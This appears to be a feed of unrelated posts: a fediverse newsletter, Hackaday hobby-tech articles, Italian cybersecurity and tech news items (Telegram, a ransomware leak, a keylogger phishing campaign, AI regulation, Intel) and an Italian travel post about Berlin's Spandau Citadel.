Newsmast has build a new version of groups software for the fediverse, and the first group is dedicated to the Harris campaign. There are few types of groups available that integrate with Mastodon, such as with Friendica or a.gup.pe. These groups function virtually identical to hashtags, by boosting out posts where the group account is tagged in to everyone who follows the group account. As there is no moderation in these types of group accounts, it allows anyone to hijack the group account. A group account dedicated to a political campaign is especially vulnerable to this. On Mastodon a volunteer Harris Campaign group used a Friendica group for campaign organising, but the limited moderation tools (blocking a user from following the group) that are available are not working, which allowed blocked users to still get their posts boosted by the group account. Newsmast’s version of Groups gives (working) moderation tools, and only boosts top level comments and not replies, to cut down on the noise. For now, the new Group is only available to the Harris Campaign group for testing, but it will come later to Mastodon servers that run the upcoming Patchwork plugin.

Bluesky added quite a number of new anti-toxicity features in their most recent app update. Bluesky has added quote posting controls, allowing people to set on a per-post basis if people can quote the post or not. There is also the option to remove quotes after the fact as well: if you’ve allowed quote posts on a post you’ve made, but someone made a quote post that you do not feel comfortable with, you have the possibility to detach your post. Another update is the possibility to hide replies on your posts. Bluesky already hides comments under a ‘show more’ button if the comment is labeled by a labeler you subscribe to. You now have the option to do so on all comments that are made on your posts, and the hidden comment will be hidden for everyone. Finally, Bluesky has changed how replies are shown in the Following feed, which is an active subject of discussion. I appreciate the comments made by Bluesky engineer Dan Abramov here, who notes there are two different ways of using Bluesky, who each prioritise comments in conflicting ways. As new communities grow on Bluesky, prioritising their (conflicting) needs becomes more difficult, and I’m curious to see how this further plays out.

The WVFRM (Waveform) podcast of popular tech YouTuber MKBHD has a special show about the fediverse, ‘Protocol Wars – The Fediverse Explained!’. It is partially a discussion podcast, partial explainer, and partial interview with many people within the community. They talk with Mastodon’s Eugen Rochko, Bluesky’s Jay Graber, Threads’s Adam Mosseri, and quite some more people. It is worth noting for a variety of reason. The show is quite a good introduction, that talks to many of the most relevant names within the community. MKBHD is one of the biggest names in the tech creator scene, and many people are paying attention to what he and his team is talking about. Furthermore, I found the framing as ‘protocol wars’ interesting, as the popularity of Bluesky in Brazil as an X replacement indicates that there is indeed a race between platforms to be build on top of the new dominant protocol.

Darnell Clayton has a very interesting blog post, in which he discovers that there is a discrepancy in follower count for Threads accounts that have turned on fediverse sharing. Clayton notes that the follower count shown in the Threads app is lower than the one shown in a fediverse client, for both Mastodon and Flipboard. He speculates that this difference is the number of fediverse accounts that follow a Threads account. It should be noted that this is speculation and has not been confirmed, but if this is true, it would give us a helpful indication of how many fediverse accounts are using the connection with Threads. While we’re talking about Threads accounts, Mastodon CEO Eugen Rochko confirmed that the mastodon.social server has made a connection with 15.269 Threads accounts who have turned on fediverse sharing.

The Links


That’s all for this week, thanks for reading.

#fediverse

fediversereport.com/last-week-…



3D Printed Homes Are All the Hype, but What is Their Real Impact?


The BioHome3D by University of Maine.

Additive manufacturing (AM) has been getting a lot of attention over the years, with its use in construction a recurring theme. Generally this brings to mind massive 3D printers that are carted to construction sites and assemble entire homes on the spot. That’s the perspective with which a recent ZDNet article by [Rajiv Rao] opens, before asking whether AM in construction is actually solving any problems. As [Rajiv] notes, the main use of such on-site AM construction is for exclusive, expensive designs, such as ICON’s House Zero which leans into the extruded concrete printing method.

Their more reasonable Wolf Ranch residential homes in Texas also use ICON’s Vulcan II printer to print walls out of concrete, with a roof, electrical wiring, plumbing, etc. installed afterwards. Prices for these Wolf Ranch 3 to 4 bedroom houses range from about $450,000 to $600,000, and ICON has been contracted by NASA to work a way to 3D print structures on the Moon out of regolith.
188574353D printed home by WASP out of clay. (Credit: WASP)
Naturally, none of these prices are even remotely in the range of the first-home buyers, or the many economically disadvantaged who make up a sizable part of the population in the US and many other nations in the Americas, Africa, etc. To make AM in construction economically viable, it would seem that going more flatpack and on-site assembly is the way to go, using the age-old pre-fabrication (prefab) method of constructions.

This is the concept behind the University of Maine’s BioHome3D, which mainly uses PLA, wood fiber and similar materials to create modules that contain insulation in the form of wood fiber and cellulose. These modules are 3D printed in a factory, after which they’re carted off to the construction site for assembly, pretty much like any traditional prefab home, just with the AM step and use of PLA rather than traditional methods.

Prefab is a great way to speed up construction and already commonly used in the industry, as modules can have windows, doors, insulation, electrical wiring, plumbing, etc. all installed in the factory, with on-site work limited to just final assembly and connecting the loose bits. The main question thus seems to be whether AM in prefab provides a significant benefit, such as in less material wasted by working from (discarded) wood pulp and kin.

While in the article [Rajiv] keeps gravitating towards the need to use less concrete (because of the climate) and make homes more affordable through 3D printing, AM is not necessarily the panacea some make it out to be, due to the fact that houses are complex structures that have to do much more than provide a floor, walls and a roof. If adding a floor (or two) on top of the ground floor, additional requirements come into play, before even considering aspects like repairability which is rarely considered in the context of AM construction.


hackaday.com/2024/09/01/3d-pri…



Swiss Researchers May Have Solved Hydrogen Storage


18841780

If you follow the world of clean energy, you will probably have read all about the so-called hydrogen future and the hydrogen economy. The gas can easily be made from water by electrolysis from green solar electricity, contains a lot of stored energy which is clean to recover, and seems like the solution to many of our green energy woes. Sadly the reality doesn’t quite match up as hydrogen is difficult to store and transport, so thus far our hydrogen cars haven’t quite arrived. That hasn’t stopped researchers looking at hydrogen solutions though, and a team from ETH Zurich might just have found a solution to storing hydrogen. They’re using it to reduce iron oxide to iron, which can easily release the hydrogen by oxidation with water.

Their reactor is simplicity itself, a large stainless steel tank filled with powdered iron ore. Pump hydrogen into it and the iron oxide in the ore becomes water and iron which forms the storage medium, and retrieve the hydrogen later by piping steam through the mixture. Hydrogen generated in the summer using solar power can then be released in the winter months. Of course it’s not perfectly efficient, and a significant quantity of energy is lost in heat, but if the heat is recovered and used elsewhere that effect can be mitigated. The hope is that their university might be benefiting from a pilot plant in the coming years, and then perhaps elsewhere those hydrogen grids and cars might become a reality. We can hope.

Meanwhile, in the past we’ve looked at a not quite so green plan for a hydrogen grid.


hackaday.com/2024/09/01/swiss-…



Indipendenza di Telegram in Discussione: Durov Ammette Contatti con i Servizi Segreti Francesi


Recentemente si è saputo che il fondatore di Telegram , Pavel Durov, aveva collaborato con i servizi segreti francesi, il che ha suscitato discussioni e dubbi sulle sue pretese di indipendenza e riservatezza. Durante l’interrogatorio a Parigi, Durov ha ammesso di aver aperto un canale di comunicazione ufficiale con il controspionaggio francese (DGSI), che, secondo lui, ha contribuito a prevenire diversi attacchi terroristici.

Secondo Libération, i contatti tra Durov e la DGSI sono avvenuti tramite una speciale hotline e un indirizzo e-mail destinati allo scambio di informazioni riservate.

Durov, che da tempo si presenta come difensore della libertà e dell’indipendenza nello spazio digitale, in precedenza ha negato di collaborare con qualsiasi agenzia governativa. Tuttavia, la sua ammissione di cooperazione con le agenzie di intelligence francesi solleva dubbi su quanto indipendenti rimangano le piattaforme da lui create.

È interessante notare che la collaborazione con la DGSI è iniziata ancor prima del suo arresto nell’agosto 2024, quando Durov fu detenuto all’aeroporto di Parigi Le Bourget. In questo contesto di detenzione, il tribunale francese ha ordinato a Durov di collaborare con le autorità, confiscandogli tutti i passaporti e vietandogli di lasciare la Francia fino alla conclusione delle indagini .

Queste informazioni provocano reazioni contrastanti nella società: da un lato la cooperazione per prevenire gli attacchi terroristici può essere considerata una misura necessaria, dall’altro ciò va contro le dichiarazioni pubbliche di Durov sull’indipendenza e la protezione della privacy degli utenti di Telegram. Alcuni analisti ricordano anche i precedenti contatti di Durov con le autorità russe, il che aumenta ulteriormente i dubbi sulle sue vere motivazioni.

Dall’altra parte c’è chi dice che Telegram ha ancora contatti con le intelligence russe e fornisce regolarmente informazioni su quanto accade al suo interno relativamente alla politica Francese. Come riporta Politico, sembrerebbe che moltissimi politici francesi utilizza Telegram come mezzo di scambio di informazioni, oltre a gruppi ufficiali di comunicazione diretta con la stampa.

Al momento non è noto come tutto questo riconoscimento influenzerà la reputazione di Durov e il futuro lavoro di Telegram. Una cosa però è chiara: la questione del connubio tra sicurezza e libertà è ancora una volta al centro delle discussioni sul futuro digitale.

Una volta il grande Jhon McAfee disse “E’ molto difficile mantenere una crittografia non violabile se questa la condividi con il governo”.

L'articolo Indipendenza di Telegram in Discussione: Durov Ammette Contatti con i Servizi Segreti Francesi proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



An Attractive Magnet Insertion Tool


Two tools for placing magnets with ease, one for each polarity.

Magnets are pretty nice little tools. [EmGi] has used them in many a cool 3D printed build with great success. But getting them where you want can be really tricky. More often than not, you end up with glue all over your fingers, or the magnets fly out of place, or they stick together when you don’t want them to.

Depositing an array of 64 magnets into a 3D print to stress test the magnet-depositing tool.Well, [EmGi] created a mighty fine magnet insertion tool that you can print for yourself. It’s finger-operated and uses a single embedded magnet to place magnets wherever they’re needed.

This thing went through several designs before [EmGi] ever printed it out. Originally, there were two magnets, but there was an issue where if the tool wasn’t lifted off perfectly, it would send the magnet flying.

But now it works great, and [EmGi] even deposited an array of 64 magnets without using glue to test it out before printing a second one to handle the other polarity. Check out the build/demo video after the break.

While you’re printing and placing magnets, why not make yourself a couple of magnetic switches? You can even make ’em for keyboards.

youtube.com/embed/MAJZ8wi2-ao?…

Thanks for the tip, [Keith]!


hackaday.com/2024/09/01/an-att…



Ieri avevo in programma un giro per negozi di biciclette per vedere e provare un po' di bici elettriche. Uno di questi si trova a Spandau, che rispetto a casa mia è inculatissima (un'ora di viaggio minimo) per cui ho unito l'utile al dilettevole e con l'occasione sono stata anche a visitare la Cittadella.


Vista dalla Juiliusturm (1230), dicono il più antico edificio preservato di Berlino.

Questa scelta mi ha innanzitutto regalato la conoscenza degli Heilung, band che pesta tantissimo e che suonava la sera stessa proprio nella Cittadella. I tecnici che ne facevano il soundcheck mentre io gironzolavo me li hanno fatti apprezzare. Se amate la musica che pesta tantissimo date loro un orecchio, secondo me possono messere d'accordo gente dai gusti diversi (purché pestino! L'ho detto che pestanopestanopestano?).

Poi va detto che il biglietto di ingresso a 4,50 € stracciati dà accesso a tutti e sei i musei presenti nel complesso, piccoli, diversi, ma tutti meritevoli. Ho saltato solo il Centro d'Arte Contemporanea perché chiuso per allestimento di una mostra.

Prima fermata: la "finestra archeologica"

Qui sono conservati gli scavi archeologici che hanno portato alla luce le tre fasi costruttive della fortificazione. Dal XIII al XVI secolo si vede l'evoluzione dalla prima palizzata in legno, alle mura in pietra medievali, al castello in stile rinascimentale e mattoni rossi oggi visibile. Vengono spiegati anche dettagli ingegneristici, tipo che per costruire i bastionazzi così come sono oggi hanno "sbrodolato" fuori dai confini dell'isoletta su cui era sorto il nucleo originario. Per costruire in acqua hanno praticamente fatto una fitta base di "denti" di legno su cui poi è stata costruita la struttura attuale. Che non sia sprofondato tutto per me ha del miracoloso.

Seconda fermata: il museo civico di Spandau

Qui sono esposti reperti della storia di Spandau: dalle repliche dei documenti ufficiali, agli oggetti di uso comune, al prodotto dell'industria qui storicamente stanziata, al (ovviamente) nazionalsocialismo, alla divisione.


Questi sono giocattoli, che già di per sé mi fa rabbrividire. Alle stuatuine di Hitler e Göring si può alzare il braccino per fargli fare il saluto nazista. Ha un sapore distopico, invece è successo davvero: dei bambini hanno giocato con 'sta roba.

Gironzolando qui ho scoperto che parte di Metropolis è stata girata a Spandau (pensavo solo ai Babelstudios, e invece) e c'è un memoriale di una persona che ha partecipato alla produzione che vorrò leggere per intero. Amo Metropolis!

Terza fermata: la sala d'armi (o come diavolo vogliamo tradurre Exerzierhalle)

Qui sono conservati cannoni. Decine e decine di cannoni. Il più vecchio è del primo '400, il più giovane risale alla Prima Guerra Mondiale.


Immaginate di stare accovacciati qui dietro a sparare al "nemico".

La sala è chiusa e, con il caldo, dentro ristagna un odore che ricorda un'officina meccanica, ma con un "twist" tutto suo. Il mio cervello lo ha etichettato come "odore di guerra", ma non penso che sul campo la puzza fosse quella (o almeno non soltanto quella).
Toccacciando in giro (perché qui è concesso mettere le mani sugli artefatti) ho poi constato come ci sia stata un'epoca, tra '600 e '700, in cui usava mettere motti vari sui cannoni. Questo qua mi ha colpita di più:


Dice:"Saturnus frist (!) die Kind allein ich fress sie aller gros (!) und klein" (grossomodo: "Saturno mangia solo i bambini, io mangio tutti, grandi e piccini". Che detto da un cannone ci sta).

Quarta tappa: il deposito provvigioni

Questo è un edificio del periodo rinascimentale, in parte ricostruito, oggi adibito a galleria che preserva una serie di monumenti scultorei precedentemente sparsi per Berlino dal XVIII al XX secolo. Praticamente un consesso di figure rilevanti per la storia della città (e non solo). Alla fine c'è anche lui: il capoccione di Lenin!


Avete presente il megaprogetto di Hitler per la trasformazione di Berlino nella "Welthauptstadt Germania"? Come doveva diventare una città monumentale, con al centro un ipermega edificio celebrativo? Ecco. Questo plastico rende l'idea di quanto megalomane fosse il progetto di quell'edificio: quella cosina a destra è la porta di Brandeburgo, in scala.

Quinta tappa: la casa del comandante

L'ho vista per ultima, ma, essendo sopra la biglietteria, in realtà si potrebbe vedere anche come prima cosa. Qui sono conservati reperti e documenti della storia della Cittadella, altri dettagli sulle fasi costruttive, ma anche flora e fauna del luogo.

Che dire alla fine di tutto questo? Ma niente, solo che ogni volta che sfioro la storia di questa città il brivido lungo la schiena è assicurato. Qua sono successe cose folli.

(Oh, le bici in tutto questo le ho provate eh. Ho due candidate tra cui decidere).

#MuseiDaVedere #Berlino #Spandau



Play Ransomware pubblica i primi dati del presunto attacco a Microchip Technology


I membri del gruppo di estorsione Play ha pubblicato sul loro sito web nelle darknet i dati presumibilmente rubati al produttore americano di chip Microchip Technology.

La settimana scorsa, Microchip Technology ha riferito che alcuni dei suoi impianti di produzione sono stati danneggiati da un attacco informatico. L’azienda ha circa 123.000 clienti in una varietà di settori, tra cui industriale, automobilistico, di consumo, aerospaziale e della difesa, delle comunicazioni e dell’informatica.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.
18830327
A causa dell’incidente, alcuni siti produttivi di Microchip Technology non funzionavano a pieno regime, il che ha influito negativamente sulla capacità dell’azienda di evadere gli ordini. Inoltre, Microchip Technology ha dovuto adottare misure per risolvere la situazione, ovvero disattivare e isolare alcuni dei sistemi interessati dall’hacking.

La settimana scorsa non si sapeva chi ci fosse dietro l’attacco, ma ora il gruppo di hacker Play ha pubblicato informazioni sull’hacking di Microchip Technology sul suo sito web underground e il 29 agosto gli hacker hanno iniziato a pubblicare dati presumibilmente rubati all’azienda.

Gli aggressori hanno già reso pubblici più di 5 GB di archivi, che presumibilmente contengono informazioni personali, documenti d’identità e documenti relativi a clienti, budget, contabilità, stipendi, contratti e tasse di Microchip Technology.
18830329
Gli aggressori affermano che si tratta solo di una parte dei file rubati e intendono rilasciare il resto dei dati se l’azienda si rifiuta di pagare il riscatto.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Play Ransomware pubblica i primi dati del presunto attacco a Microchip Technology proviene da il blog della sicurezza informatica.



Un solo Click su un File XLS e i tuoi Dati saranno Compromessi!


Recentemente, FortiGuard Labs, una divisione di ricerca di Fortinet, ha rilevato una nuova campagna di phishing che diffonde malware attraverso un documento Excel allegato a un’e-mail. L’analisi ha mostrato che questo documento fornisce una nuova versione di Snake Keylogger, un pericoloso software per il furto di dati.

Snake Keylogger, noto anche come “404 Keylogger” o “KrakenKeylogger”, è uno strumento venduto sui forum underground con un modello di abbonamento.

Questo software, scritto in .NET, ha molteplici funzionalità per la raccolta di informazioni sensibili, comprese credenziali da browser Web e altri programmi popolari, contenuti degli appunti e informazioni di sistema di base. Snake Keylogger può anche registrare le sequenze di tasti e acquisire screenshot.
18828434Email di phishing (Fonte Fortinet)
L’attacco di phishing inizia con un’e-mail progettata per indurre il destinatario ad aprire un file Excel allegato chiamato “swift copy.xls”. L’e-mail afferma che i fondi sono stati depositati sul conto dell’utente, invitandolo ad aprire il file per verificare i dettagli.

Quando apri un file Excel, viene attivato un codice dannoso che scarica e avvia una nuova versione di Snake Keylogger. Gli aggressori sfruttano la vulnerabilità CVE-2017-0199 per scaricare un file dannoso tramite un collegamento nascosto in un documento.
18828436Flusso di lavoro della campagna Snake Keylogger. (Fonte Fortinet)
Una volta lanciato con successo sul computer della vittima, Snake Keylogger ne garantisce la furtività e la durabilità attraverso l’uso di sofisticati metodi di crittografia e mascheramento. Il software è incorporato nei processi di sistema e non viene rilevato dalle soluzioni antivirus.

Per proteggere i tuoi dispositivi e le tue reti da questi tipi di attacchi, Fortinet consiglia di aggiornare regolarmente il software di sicurezza e di completare la formazione sulla sicurezza informatica.

L'articolo Un solo Click su un File XLS e i tuoi Dati saranno Compromessi! proviene da il blog della sicurezza informatica.



Attacchi cyber nei paesi a basso sviluppo economico


@Informatica (Italy e non Italy 😁)
L’idea che gli hacker colpiscano esclusivamente i paesi industrialmente più potenti è errata; certamente Stati Uniti, Cina, Europa, sono costantemente al centro di attacchi informatici ma ci sono scenari offensivi […]
L'articolo Attacchi cyber nei paesi a basso sviluppo economico proviene da Edoardo



CL-32: The Minimum Possible For a Useful Handheld Computer


18826389

For almost as long as there have been microcomputers, there have been attempts with varying success to make tiny handheld microcomputers. Sometimes these have been very good, and other times they’ve missed the mark in some way. Latest to find its way to us is the CL-32 from [Moosepr], it’s a handheld computer with an ESP32 as brains, an electronic paper display, and a QWERTY keyboard in its smart printed case.

The hardware is relatively standard, save for the keyboard which is a dome-switch design in which the membrane carrying the domes is hand-made. We like this, and don’t think we’ve seen anyone else doing that. Expansion is taken care of by a novel socket arrangement in which boards nestle in a recess in the surface. Some experimentation was required as always to drive the display, but the result is a functional computer.

Sadly there’s little detail in terms of what the software will be, and no hardware files as yet. But what we can see is promising enough to make this one to watch, so we’ll look forward to what they come up with. If an ESP32 OS is a problem, there’s always badge.team, who have been continuously improving theirs since 2017.


hackaday.com/2024/09/01/cl-32-…



Il Governo USA svela il piano Anti-Skynet! GPT-5 sottoposto a Test prima del rilascio


OpenAI, che ha raddoppiato il numero di utenti attivi in meno di un anno e continua a essere una delle realtà più influenti nel campo dell’intelligenza artificiale. Tuttavia, la sua recente scelta di siglare un accordo di sicurezza con Anthropic e le nuove normative proposte come la legge SB 1047 hanno suscitato discussioni e critiche.

Espansione e Critiche su OpenAI


Nonostante l’evidente successo, con oltre 200 milioni di utenti settimanali di ChatGPT e un recente round di finanziamento, OpenAI è stata al centro di polemiche. La crescita rapida ha visto anche la competizione intensificarsi, con Google, Microsoft e Meta che hanno lanciato le proprie applicazioni di chat AI. Nonostante ciò, OpenAI mantiene una posizione di leader nel settore.

Tuttavia, l’alto tasso di utilizzo non ha protetto OpenAI da critiche e scandali. L’azienda è stata accusata di cattive condizioni finanziarie e il suo prodotto “Her”, lanciato a maggio, ha suscitato opinioni contrastanti, senza compromettere il suo status di leader di mercato.

Recentemente, OpenAI ha visto un aumento significativo dell’utilizzo dell’API, raddoppiando dall’uscita del modello GPT-4o a luglio. Inoltre, PricewaterhouseCoopers ha stretto un accordo con OpenAI per diventare un distributore di ChatGPT, mentre altre aziende come Salesforce, Snap e Shopify hanno integrato le soluzioni AI di OpenAI nelle loro piattaforme.

Accordo di Sicurezza con Anthropic e Nuove Regolamentazioni


Un aspetto rilevante è l’accordo tra OpenAI e Anthropic per i test di sicurezza dei modelli di intelligenza artificiale, un passo senza precedenti che prevede la consegna dei modelli al governo degli Stati Uniti per la valutazione della sicurezza. Il National Institute of Standards and Technology (NIST) ha confermato la collaborazione, sottolineando l’importanza di garantire che la sicurezza pubblica non dipenda esclusivamente dalle capacità delle aziende tecnologiche.

L’AI Safety Institute degli Stati Uniti e il suo omologo britannico parteciperanno alla revisione dei modelli per identificare e mitigare potenziali rischi.

Legge SB 1047: Impatti e Controversie


La legge SB 1047, in fase di approvazione in California, mira a regolamentare lo sviluppo e l’impiego dell’intelligenza artificiale nello stato. Il disegno di legge prevede misure come l’obbligo per le aziende di implementare “interruttori di emergenza” per prevenire danni e responsabilità pesanti in caso di incidenti causati dalla tecnologia.

Questo ha sollevato preoccupazioni significative: sebbene il disegno di legge preveda misure di sicurezza, molti esperti temono che possa ostacolare l’innovazione e non affrontare adeguatamente i rischi esistenti come i deepfake e la disinformazione.

L’SB 1047 richiede anche agli sviluppatori di monitorare l’uso della loro tecnologia e affrontare multe significative in caso di danni causati dai loro modelli di intelligenza artificiale. Alcuni critici, tra cui Martin Casado e Andrew Ng, hanno espresso preoccupazione per il potenziale impatto negativo della legge sull’innovazione e sulla sicurezza.

Reazioni e Prospettive Future


Il dibattito su SB 1047 riflette le tensioni tra regolamentazione e innovazione nel campo dell’IA. Mentre aziende come Anthropic accolgono con favore la regolamentazione con la speranza che possa prevenire i rischi, OpenAI e altri critici temono che le misure proposte possano avere conseguenze negative per lo sviluppo tecnologico.

La comunità open source è particolarmente preoccupata per le implicazioni finanziarie e operative del disegno di legge, soprattutto per le piccole aziende e i progetti open source che potrebbero trovarsi a fronteggiare oneri economici e regolatori considerevoli.

La discussione su questi temi è destinata a proseguire mentre la legge SB 1047 si avvicina alla sua possibile approvazione e le aziende tecnologiche continuano a confrontarsi con le sfide della sicurezza dell’intelligenza artificiale.

L'articolo Il Governo USA svela il piano Anti-Skynet! GPT-5 sottoposto a Test prima del rilascio proviene da il blog della sicurezza informatica.



Intelligenza Artificiale e politica, necessario recuperare gap di conoscenza. Attenzione al dato


@Informatica (Italy e non Italy 😁)
Alla recente Festa Nazionale dell’Unità in Emilia Romagna, ho avuto modo di seguire il dibattito politico che anche in Italia, come nel resto del mondo sta impattando sulla società: quello sull’Intelligenza Artificiale.



Intel in crisi: pronta a licenziare il 15% della forza lavoro e vendere la fonderia


Intel Corp. sta valutando la vendita della sua attività di fonderia nel tentativo di consolidare la sua performance finanziaria, hanno riferito oggi numerose pubblicazioni.

CNBC ha citato fonti che affermano che un accordo del genere è una delle diverse opzioni che il produttore di chip sta prendendo in considerazione per affrontare i venti contrari che affliggono la sua attività.

Bloomberg, nel frattempo, ha riferito che Intel potrebbe anche valutare la possibilità di abbandonare alcuni progetti di costruzione.

Lo sviluppo arriva poche settimane dopo che l’azienda ha pubblicato i risultati trimestrali che sono stati inferiori alle aspettative del mercato. Le vendite di Intel nei tre mesi conclusi il 29 giugno sono scese dell’1%, a 12,8 miliardi di dollari, leggermente meno dei 12,9 miliardi di dollari che gli analisti avevano previsto. Gli utili rettificati dell’azienda di due centesimi per azione sono scesi ben al di sotto dei 10 centesimi che gli investitori si aspettavano.

In risposta ai risultati deludenti, Intel ha annunciato un’ampia iniziativa di ristrutturazione progettata per migliorare la sua redditività. Lo sforzo vedrà l’azienda licenziare circa il 15% della sua forza lavoro. Intel si è prefissata l’obiettivo di tagliare le sue spese annuali di 10 miliardi di dollari l’anno prossimo.

Una vendita dell’attività di fonderia di Intel, che utilizza le fabbriche dell’azienda per realizzare chip per altre organizzazioni, potrebbe potenzialmente contribuire a ridurre ulteriormente i costi operativi. L’unità ha registrato una perdita di 1,8 miliardi di dollari lo scorso trimestre. Gli analisti citati da Bloomberg prevedono che l’attività continuerà a operare in rosso per il prossimo futuro.

L'articolo Intel in crisi: pronta a licenziare il 15% della forza lavoro e vendere la fonderia proviene da il blog della sicurezza informatica.



CCFL Scanner Bulb Makes a Cool Desk Lamp


18820542

The bulbs inside scanners (before transitioning to LED, anyway) were cold cathode fluorescent tubes that emit a fairly wide bandwidth of light. They were purpose-built to produce a very specific type and shape of light, but [Julius Curt] has taken this in a new, upcycled direction. Instead of just producing light, the light itself is also part of the aesthetic. A very cool 3D printed case houses the bulb and power supply and smartly hides the connecting wires to achieve a very clean look.

18820544

Part of the design involves adding a DC-DC converter before the lamp driver, allowing fading of the light. This isn’t anything new in lamps, but [Julius] noticed an interesting effect when dimming the vertically oriented lamp: as the power was reduced, the column of light would start to extinguish from one end, leading to an elongated teardrop-shaped light source.

This leads to a very interesting look, and the neat case design leads to an extremely unique lamp! The emitted light’s color temperature seems to vary a bit as the voltage drops, going from what appears to be a pretty cold white to a slightly warmer tone.

The design process is detailed on the project page, with a quick look at the CAD design process for the case. A neat touch was using a greeble (part of a coffee grinder) to add some different textures and break up the plastic-only look. That’s one we’ll have to note in our design books!

youtube.com/embed/kRiMfGZ9pEY?…


hackaday.com/2024/08/31/ccfl-s…



Your Name In Landsat


18816172

We’re guessing most readers can cite things from their youth which gave them an interest in technology, and spurred on something which became a career or had a profound impact on their life. Public engagement activities for technology or science have a crucial role in bringing forth the next generations of curious people into those fields, and along the way they can provide some fun for grown-ups too.

A case in point is from NASA’s Landsat engagement team, Your Name In Landsat. Type in a text string, and it will spell it out in Earth features seen by the imaging satellites, that resemble letters. Endless fun can be had by all, as the random geology flashes by.
The text entry form with a pop-up warning only A to Z are accepted.No text emojis, boo hiss!
In itself, though fun, it’s not quite a hack. But behind the kids toy we’re curious as to how the images were identified, and mildly sad that the NASA PR people haven’t seen fit to tell us. We’re guessing that over the many decades of earth images there exists a significant knowledge base of Earth features with meaningful or just amusing shapes that will have been gathered by fun-loving engineers, and it’s possible that this is what informed this feature. But we’d also be curious to know whether they used an image classification algorithm instead. There must be a NASA employee or two who reads Hackaday and could ask around — let us know in the comments.

Meanwhile, if LANDSAT interests you, it’s possible to pull out of the air for free.


hackaday.com/2024/08/31/your-n…



GAZA. Israele costruisce un nuovo corridoio per il controllo permanente


@Notizie dall'Italia e dal mondo
Cominciata a inizio novembre, secondo il Forensic Architecture, la costruzione della strada è costata la distruzione di fattorie, terreni agricoli, abitazioni, frutteti e garantirà alle truppe un accesso sicuro fin dentro Gaza City
L'articolo GAZA. Israele



The Trashiest Of Mains Inverters


18811273

Switch-mode technology has made inverters which take a low DC voltage and turn it into a usable mains voltage within the reach of everybody. But still, there might be moments when a mains supply is needed and you’re not lucky enough to have AliExpress at your fingertips, and for that, here’s [Rulof] with a mains inverter that is simultaneously awful and awesome. He’s made a rotary converter, from trash and off the shelf parts.

While a switch-mode converter operates using PWM at many times the output frequency for efficiency, we’re guessing that most readers will be familiar enough with how AC works to see how a low frequency converter turns DC into AC. A set of switches repeatedly flip the polarity, and the resulting square wave is fed into a transformer to step up to the final voltage. The switches can be mechanical as with old-style converters that used vibrating reeds or rotary armatures, or they can be electronic using power transistors. In this case they are a set of microswitches actuated by a set of cams on a shaft driven by a small motor, and the transformer comes from a surplus UPS.

We’re guessing that the frequency will be only a few Hz and the microswitches will suffer from switching such an inductive load, but as you can see in the video below the break it does light a mains bulb, and we’re guessing it would be enough to activate most wall-wart switching power supplies. We’re not so sure though about his use of the IEC sockets from the UPS to carry 12 volts, as the current may be a little much for them.

Meanwhile if you thirst for more of this kind of thing, we have you covered.

youtube.com/embed/41-9sknFJyw?…


hackaday.com/2024/08/31/the-tr…



Recensione : MELT-BANANA – 3 + 5


“Che cazzo è ‘sta roba?!?!?!?” si chiese meravigliato chi vi scrive, quando ha scoperto dell’esistenza, anni fa, dei giapponesi Melt-Banana, dal 1992 tra i principali agitatori della scena/movimento concettuale “Japanoise”, vale a dire degli autentici terroristi sonori, da Tokyo con furore, fautori di uno schizofrenico sound a base di hardcore ipercinetico, noise rock e frattaglie di musica elettronica ispirata da videogames, anime e fumetti manga. @Musica Agorà iyezine.com/melt-banana-3-5


2024 Tiny Games Contest: ATtinyBoy Does It with Tiny Cartridges


Left: the ATtinyBoy and cartridges inside a custom case. Right: ATTinyBoy under the hood.

What is it about tangible media? There’s just something neat about having an individual thing that represents each game, each album, each whatever. Sure, you can have a little console with a thousand games loaded on it, but what’s the fun in that?

A Tetris cartridge made of a broken-out ATtiny85 and header pins.Enter the ATtinyBoy. [Bram]’s entry into the Tiny Games Contest is based on the ATtiny85, and the whole thing is smaller than a credit card. In fact, each little game cartridge contains its own ATtiny85, with the pins broken out into headers.

That is, although the schematic is based on [Billy Cheung]’s gametiny, which uses an ATtiny85 as the brain, ATtinyBoy’s brain is divided among each of the games.

This certainly checks a lot of boxes when it comes to contest rules and requirements, and it’s just awesome besides. We particularly like the custom box that holds ATtinyBoy and all his distributed knowledge. If you want to make one of your own, the schematic, code, and STLs are all available over on IO.

2024 Tiny Games Challenge


hackaday.com/2024/08/31/2024-t…